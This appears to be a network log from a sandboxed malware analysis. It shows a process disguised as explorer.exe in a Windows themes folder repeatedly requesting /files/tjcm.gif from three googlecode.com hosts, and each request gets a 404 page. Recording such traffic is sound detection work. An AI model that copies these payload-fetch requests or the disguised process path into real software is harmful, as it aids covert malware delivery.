                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:13.192903996 CET | 494 | IN |
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:14.612087965 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:15.318314075 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:15 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:15.318335056 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:16.547116995 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:17:17.276469946 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:17 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:17.276489973 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:18.631751060 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:17:20.022891045 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:19 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:20.022921085 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Jan 13, 2025 13:17:20.022932053 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Jan 13, 2025 13:17:20.022989035 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:19 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:20.023344040 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:19 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:20.031030893 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49737 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:21.414921999 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:17:22.119729996 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:22 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:22.119748116 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49741 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:23.657912016 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:17:24.360690117 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:24 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:24.360723019 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.4  49743        74.125.133.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:17:25.950253010 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:26.645627975 CET  1236               IN         HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:26 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:26.645646095 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.4  49744        64.233.167.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:17:28.057588100 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:28.780839920 CET  1236               IN         HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:28 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:28.780858994 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.4  49745        66.102.1.82     80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:17:30.200907946 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:30.841253042 CET  1236               IN         HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:30 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:30.841276884 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.4  49746        74.125.133.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:17:32.084346056 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:32.813036919 CET  1236               IN         HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:32 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:32.813150883 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.4  49747        64.233.167.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:17:34.135626078 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:34.851833105 CET  1236               IN         HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:34 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:34.851852894 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49748 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:36.334028959 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:37.049127102 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:36 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:37.049154043 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49749 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:38.353219986 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:39.069102049 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:38 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:39.069123030 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
